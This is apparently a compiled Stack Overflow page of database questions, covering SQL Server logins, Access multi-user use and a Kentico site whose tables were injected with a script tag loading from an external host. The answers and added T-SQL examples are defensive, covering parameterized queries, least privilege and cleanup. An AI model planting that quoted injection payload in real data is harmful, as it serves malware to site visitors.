From Paradox to SQL Server in Borland C++ 5

I'm in the process of converting an old application to work with SQL Server instead of hundreds of Paradox DB files.
I'm using ODBC and most of the stuff is working.
However I do have a problem.
In some forms, it is asking for a password. I've double-checked the TDatabase and TTable components, added USER NAME=sa and PASSWORD=****** to the Parameters and turned OFF the LoginPrompt.
What's missing?
Is there any other way to initialize just once all the 5 databases and don't ever ask for password again?!
I've checked other questions here at StackOverflow, but didn't find a suitable one :(
Thank you

You can use SQL Server "Windows Authentication" mode. You can assign the database permissions to a Windows Domain group/groups or individual Windows users. In this case the users will be automatically authenticated to the databases without prompts.

Related

Deploying a Windows Form App in C# for multiple users with SQL Server. Alternatives for databases?

I'm working on a database driven program in Visual Studio 2015, in C#, Windows Form Application, and I'm using SQL Server 2014 for my databases, downloaded the most recent version from the MSDN site.
I've got it working well. But if I want other users on other computers and different versions of Windows, this would require them to have SQL Server installed, correct?
Basically the app is used for storing current medications, moods, a mood quiz, symptoms, etc.. and I store all the results in SQL Server databases. They can be edited, deleted, etc through the program's GUI. Do the users need SQL Server installed to use this app?
If so, is there an alternative to keeping databases without having to have the SQL Server connections, or is there a way to do this without the users having to have SQL Server installed? I don't want remote connections to me, I want it standalone.
Does this make any sense? If not, I can explain more. I know way back in the days of Visual Basic 4 I was making, reading and writing databases without SQL. But that was 16 years ago. So I'm wondering what the easiest solution to this is. Thanks!
In other words, you want a database that you can a) distribute to end users freely and b) that will 'connect' just to the copy of the database they have stored locally.
Here are a few options ---
SQLite over ODBC is as easy to use as MSSQL; the driver can be found here: SQLite ODBC
Use ConfigurationManager.OpenExeConfiguration to read / write your app config .xml file and use it as a key / value store. I can provide examples if needed.
Dynamically create an Access database; it should work as well as MSSQL for most things, with less overhead. Here's how: Create an Access Database
Use the SQLite DLL. Details on SO: create-sqlite-database-and-table

Access by multiple users to access database

I am not very familiar with Access databases; until now I was only programming against SQL Server, but now it's time to do so. I am building a WinForms application which will be using an Access database and I have some questions related to that, if you don't mind. My application will be used by multiple users and there will be one Access database. My questions are as below:
Is there any problem with many users accessing an Access database at the same time, or can only one user be connected?
If I develop my program to use Access 2016 and some of my users have a different Windows version and also a different Access version, will it work?
Should I know something else? :)
If your client wants to have a file-based database and this is a project constraint, MS Access is the best choice. If you want more detailed advice, please let me know how many users will perform Read/Write or Read transactions, the size of the database and if the application will run in client-server mode in a LAN/WAN, Cloud or Remote Desktop environment.
Back to your questions:
Depending on these conditions you may range from 10 to 20/25 users. Remember that you can always try with MS Access and later upgrade to a MS SQL database in a couple of hours.
If your front-end application can link to a 2016 Access database, it will do that without installing MS Access to the clients that will run your App, i.e. the vb.net compiled App will install all needed drivers. If you develop your App within MS Access 2016 (Access Form and reports, some VBA) you can run it with the free runtime version of MS Access, but this only when no older version of Access is installed on the running workstation.
Please check with your client the real reasons for a file-based database...
To answer the questions as asked:
You might run into an issue with this, as Access was really designed as a personal use database. Having anything more than a small handful of users hitting against it at once will in fact cause problems, as it's not really well designed for that purpose...
This should in theory be fine, as the application itself is interfacing with the database, not the end user...
It seems like you're taking a step backwards using access for this, and SQL might very well be better suited for this purpose. This isn't me trying to just bash access either, this comes from personal experience. Going with this sort of design is likely to cause you more headaches than good.

SQL Server database users when applications share the same database

First, English is not my native language, so this question may be answered somewhere else or may be a duplicate. I tried to Google it, but I didn't find the proper way to describe my need, so thank you for understanding.
I have two applications (Server/Clients). The database is on the Server machine, and the Client application will just connect to the database using SQL Server. I'm using EF. My question:
When I wanted to add the Data Server, the wizard asked for a SQL Authentication user:
I'm not sure, but I don't think I should use the "sa" account, right!? Can somebody confirm that for me please, and suggest the right approach to do that? Thank you so much.
No, never use SA. Make a user for the server to use and give it the needed rights. It is quite normal to have application-specific logins on a database server.
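An application-specific login with only the rights it needs, as the answer above recommends, shown as an added T-SQL example (not code from the original posts); the commented variant covers the Windows Authentication approach from the first answer on this page. The names AppDb, app_client, app_rw and CONTOSO\AppUsers and the password are hypothetical placeholders, and the example assumes the client only reads and writes data in the dbo schema.

```sql
-- Added example (T-SQL, SQL Server 2012 or later for ALTER ROLE ... ADD MEMBER).
-- Hypothetical names: AppDb, app_client, app_rw, CONTOSO\AppUsers.
USE [master];
GO
-- Dedicated login for the client application instead of sa.
-- The password is a constructed placeholder; replace it before running.
CREATE LOGIN [app_client]
    WITH PASSWORD = N'Replace-Me-With-A-Long-Random-Value-1',
         DEFAULT_DATABASE = [AppDb],
         CHECK_POLICY = ON;
-- Windows Authentication variant (no password stored in the client at all):
-- CREATE LOGIN [CONTOSO\AppUsers] FROM WINDOWS WITH DEFAULT_DATABASE = [AppDb];
GO
USE [AppDb];
GO
-- Map the login to a database user.
CREATE USER [app_client] FOR LOGIN [app_client];
-- CREATE USER [CONTOSO\AppUsers] FOR LOGIN [CONTOSO\AppUsers];
GO
-- Grant through a role, and only data access: no DDL, no server-level rights.
CREATE ROLE [app_rw];
GRANT SELECT, INSERT, UPDATE, DELETE ON SCHEMA::[dbo] TO [app_rw];
ALTER ROLE [app_rw] ADD MEMBER [app_client];
GO
-- Check 1: the application login must not be a member of sysadmin.
SELECT IS_SRVROLEMEMBER(N'sysadmin', N'app_client') AS is_sysadmin;
-- Check 2: list exactly what the role has been granted.
SELECT pr.name AS principal_name, pe.class_desc, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr
  ON pr.principal_id = pe.grantee_principal_id
WHERE pr.name = N'app_rw';
```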

How to protect my ASP.NET site and my SQL Server from hacking?

My site is created in Kentico CMS 5.5 and SQL Server 2008. It's running successfully, but these days some hacker hacked my site, and after a long time I found that in many of the tables the hacker added the
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line before every varchar cell. Suppose I have a user table; in that case it adds this string before the username, and the same string before the user's email ID. How can I protect my SQL Server from this hacking? And what is the reason behind this?
How can I protect my SQL Server from this hacking?
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack, probably aimed at sending your visitors to a malware or fraudulent site.
Unfortunately, as Kentico CMS is commercial software, your options are limited. You won't have the source that you can tweak to prevent further attacks coming through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is successful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
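One way to carry out the "clean up your data" step from the list above, as an added T-SQL example that is not part of the original answers: it scans every character column in the current database for the injected string quoted in the question, reports row counts per column, and generates UPDATE statements for review. It assumes the payload is exactly the string from the question and that a backup has been taken first.

```sql
-- Added example (T-SQL, SQL Server 2008 or later). Run in the affected database, after a backup.
SET NOCOUNT ON;
-- Injected string exactly as quoted in the question; it contains no LIKE wildcards.
DECLARE @payload nvarchar(200) =
    N'></title><script src="http://lilupophilupop.com/sl.php"></script><!--';
DECLARE @pat nvarchar(210) = N'%' + @payload + N'%';
DECLARE @esc nvarchar(400) = REPLACE(@payload, N'''', N'''''');  -- safe inside a literal

CREATE TABLE #hits (table_name nvarchar(600), column_name sysname,
                    base_type sysname, hit_rows int);

DECLARE @tbl nvarchar(600), @col sysname, @typ sysname, @sql nvarchar(max);
DECLARE col_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT QUOTENAME(s.name) + N'.' + QUOTENAME(t.name), c.name,
           TYPE_NAME(c.system_type_id)
    FROM sys.columns AS c
    JOIN sys.tables  AS t ON t.object_id = c.object_id
    JOIN sys.schemas AS s ON s.schema_id = t.schema_id
    WHERE c.is_computed = 0
      AND TYPE_NAME(c.system_type_id) IN
          (N'varchar', N'nvarchar', N'char', N'nchar', N'text', N'ntext');
OPEN col_cur;
FETCH NEXT FROM col_cur INTO @tbl, @col, @typ;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers go through QUOTENAME; the search value is bound as a parameter.
    SET @sql = N'INSERT INTO #hits SELECT @t, @c, @ty, COUNT(*) FROM ' + @tbl
             + N' WHERE ' + QUOTENAME(@col) + N' LIKE @p HAVING COUNT(*) > 0;';
    EXEC sp_executesql @sql,
         N'@t nvarchar(600), @c sysname, @ty sysname, @p nvarchar(210)',
         @t = @tbl, @c = @col, @ty = @typ, @p = @pat;
    FETCH NEXT FROM col_cur INTO @tbl, @col, @typ;
END
CLOSE col_cur;
DEALLOCATE col_cur;

-- 1) Which columns hold the payload, and in how many rows.
SELECT table_name, column_name, base_type, hit_rows FROM #hits ORDER BY hit_rows DESC;

-- 2) Cleanup statements to review and run by hand. REPLACE does not accept
--    text/ntext, so those columns are listed above but skipped here.
SELECT N'UPDATE ' + table_name + N' SET ' + QUOTENAME(column_name)
     + N' = REPLACE(' + QUOTENAME(column_name) + N', N''' + @esc + N''', N'''')'
     + N' WHERE ' + QUOTENAME(column_name) + N' LIKE N''%' + @esc + N'%'';'
       AS cleanup_statement
FROM #hits WHERE base_type NOT IN (N'text', N'ntext');

DROP TABLE #hits;
```

Cleaning the rows does not close the entry point; if the way in is still open, the same scan will show the payload reappearing.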
You need to follow the industry best practices: look at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project for the top 10 Web application security risks.
A few things to keep in mind that will save your database from hacking are given below:
Always use parametrized Sql, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = @ID");
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can on/off ValidateRequest in your page/web.config file as required.
Set Validation both in client/server side so that only valid data will pass to DB
Use an appropriate data type for each column rather than a common data type (say VARCHAR)
Thanks
I agree with @Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sorts of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the Windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here: Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog]
Look again for entries that seem to happen at odd times from weird IP addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.

Access Log in troubles

Lately there has been a problem running some of our reports in Access. Last week (the beginning of the week) we tried to run a report, let's call it A, and it kept giving us the login prompt. Even when the correct user name and password were entered, the login box would just keep reappearing until cancel was pressed.
I clicked the debug and checked the query. I then logged into the database it is pulling the data from with the same user name and password and received no trouble. Around Wednesday A was working again, even though nothing was changed. This week A is working but another report, B, is doing the same thing.
Anyone have any idea what this could be? I'm thinking maybe someone else has the report open? Any help is appreciated.
EDIT: I have narrowed down the error to one linked table that is causing the login prompt. It seems it has the DSN set up but no database specified. So I just need to relink the table. Is there any way to do this at the GUI level? Also, should I leave this question up for future users or just delete it?
Was the login prompt from Access or from Windows? If from Windows, then I'd say that there was some sort of file permission or network access issue at hand. If from Access, then I would say that something in the SYSTEM.MDW that you are using is corrupt or has been reconfigured.
If the login prompt is from ODBC it probably means that the credentials that are being used to access the backend database (per your comments you mentioned it was SQL Server) are either invalid or disabled. (Or it could be as simple as the backend database is/was temporarily unavailable).
If you are using linked tables in Access to a SQL Server it means that an ODBC connection was created and you might try verifying that the ODBC connection is working (Control Panel, Administrative Tools, Data Sources (ODBC)). In that dialog there is a place to test the connection.